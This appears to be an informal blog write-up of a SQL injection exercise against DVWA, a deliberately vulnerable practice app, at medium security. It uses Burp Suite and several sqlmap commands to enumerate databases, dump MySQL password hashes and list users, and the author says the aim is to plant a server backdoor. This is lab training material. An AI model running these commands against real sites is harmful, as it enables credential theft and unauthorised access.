TRY HARDER: SQL INJECTION DVWA (MEDIUM)

This case i using Backtrack 5 r1 to be Server.

1. access dvwa "http://192.168.56.1/dvwa"

user name : admin

password : password

2. security using MEDIUM

3. Open Mantra and brupsuit

on the mantra following refuse step

create proxy for brupsuit

open brupsuite

4. Using proxy brupsuite and then using '

showing in url

result in brupsuite

5. Run sql map

root@bt:/pentest/database/sqlmap#

Showing result

search Table

Search column

Now we can see user and password

showing

6. Ok we get the password but Our Mission is how to make backdoor in the server.. hhmmm so we must try exploit service.. i will try service mysql.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs

I have to done a lot of ways but.. i can't upload backdoor.. to be continue...

=======================================================================

After i try again wity repeat based ways..

>>>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables

>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --column

>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump

>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --password